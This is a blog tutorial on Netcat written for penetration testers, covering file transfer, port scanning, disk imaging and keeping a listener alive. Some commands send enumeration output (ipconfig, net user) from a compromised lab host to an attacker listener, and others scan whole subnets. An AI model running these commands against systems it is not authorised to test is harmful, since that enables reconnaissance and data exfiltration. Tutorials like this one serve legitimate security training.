---
layout: post
title: "Netcat"
date: "2022-06-08"
description: "This article looks at Netcat, a valuable tool in the pentesters toolbox. Hobbit released the original Netcat in 1995, but it hasn’t been maintained despite its popularity. It can sometimes be hard to find a copy of the v1.10 source code. The flexibility and usefulness of this tool prompted the Nmap Project to produce Ncat, a modern reimplementation that supports SSL, IPv6, SOCKS and HTTP proxies, connection brokering, and more."
coverimage: NETCAT.jpg
tags: netcat
published: true
posttype: article
categories: tutorial
---

# Netcat

First some brief points about Netcat
- All official versions are free of charge
- Works natively on Linux.
- Works natively on Apple Mac OS X.
- Works natively on Microsoft Windows.
- Features a command-line interface.
- Source code available for inspection.
- General-purpose tools
- Packet crafting tools

The `ncat` tool is a much better option in place of netcat or nc. 

We think `ncat` is better because of its support for multiple protocols and simultaneous connections and SSL.


## Overview

This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool to use directly or easily drive by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections.

> Netcat can operate in environments where you have low privileges, plus it is a standalone binary, meaning you can upload it to an environment and run it as is.
> Be warned that file transfers using Netcat are not encrypted, anyone on the network can grab what you are sending, so use this only on trusted networks.

## Standard Listen and Send

setup netcat in listening mode and save whatever is received to `in.txt`
```
root@box:/tmp/netcat# nc -w 1 -l -p 3000 > in.txt
```

From the sending end, we can pipe in a file called `out.txt` and send it to our listener.
```
nc -w 3 [destination] 3000 < out.txt
```

## Piping input

We can send data by sending output through a pipe to Netcat. Here we are outputting a file, but it could be several items.
```
C:\Documents and Settings\user> type c:\test.txt | c:\nc.exe 192.168.2.8 3000 -w1
```

On our kali box, we can set a while loop like follows.
```
root@evilsaint:/pentesting/enum# while true; do nc -w 4 -lvp 4321 >> enum.txt; done
```

And we can pipe enumeration commands back to our box.
```
C:\Users\labuser.ACME\Desktop\netcat-win32-1.12>ipconfig | nc64.exe 10.1.1.5 4321 -w 3
C:\Users\labuser.ACME\Desktop\netcat-win32-1.12>net user | nc64.exe 10.1.1.5 4321 -w 3
C:\Users\labuser.ACME\Desktop\netcat-win32-1.12>net account | nc64.exe 10.1.1.5 4321 -w 3
```

## Send with Compression (Linux to Linux)

On the receiving end
```
nc -l -p 1234 | uncompress -c | tar xvfp -
```

On the sending end
```
tar cfp - /some/dir | compress -c | nc -w 3 [destination] 1234
```

## Sending a harddrive

It is possible using Netcat to pipe a hardrive

On the sender end run
```
dd if=/dev/hda3 | gzip -9 | nc -l 3333
```

On the receiver end,
```
nc [destination] 3333 | pv -b > hd-image.img.gz
```

### Port Scanning with Netcat

TCP scan of ports 3385 to 3395
```
nc -nvv -w 1 -z 10.0.0.1 3385-3395
```

UDP scan of ports 3385 to 3395
```
nc -unvv -w 1 -z 10.0.0.1 3385-3395
```

Small Bash Loop to loop through all the ports from 1 to 65535 for one IP
```
for i in $(seq 1 65535); do nc -nv -w 1 -z 10.0.0.1 $i ; done
```

Small Bash Loop to loop through all the IPs on our subnet and scan for ports 21-25
```
for i in {1..254}; do nc -vv -n -w 1 10.0.0.$i 21-25 -z; done
```

| Option | Description |
| --- | --- |
| -n | don't resolve first just use the IP address and don't try and use DNS to get a hostname |
| -vv | single -v is verbose, double v -vv is extra verbosity. |
| -u | UDP mode. |
| -w | equals the timeout in seconds for net reads |
| -z | Zero I/O mode used for scanning. |

### Makeshift Permanent Netcat Listener

`nohup` is a program you can use to run your application with such that its stdout/stderr can be sent to a file instead and such that closing the parent script won’t SIGHUP the child. However, you need to have the foresight to use it before starting the application. Because of how `nohup` works, you can’t just apply it to a running process.

`disown` is a bash builtin that removes a shell job from the shell’s job list. This means that you can’t use `fg`, `bg` on it anymore, but more importantly, when you close your shell, it won’t hang or send a SIGHUP to that child anymore. Unlike `nohup`, disown is used after the process has been launched and backgrounded.

Make a Netcat listener persistent.
```
while(1) nohup netcat -lvp 4444
```